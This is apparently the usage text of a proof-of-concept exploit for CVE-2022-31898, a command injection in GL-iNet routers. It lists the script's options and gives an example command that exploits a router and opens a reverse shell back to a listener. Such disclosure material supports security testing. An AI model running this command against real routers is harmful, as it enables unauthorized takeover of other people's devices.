Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]
options:
-h, --help show this help message and exit
-R RHOST, --rhost RHOST
IP/hostname of Mango router
-P RPORT, --rport RPORT
Port to connect to Mango router on
-L LHOST, --lhost LHOST
Local host/IP for reverse shell to connect back to
-l LPORT, --lport LPORT
Local port for reverse shell to connect back on
-p PWD, --pwd PWD Password to use to log in
-t, --https If set, use HTTPS
Exploit GL-iNet router at 192.168.8.1
over HTTPS and connect back to local box at
192.168.8.123:8008
with admin password password
:
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t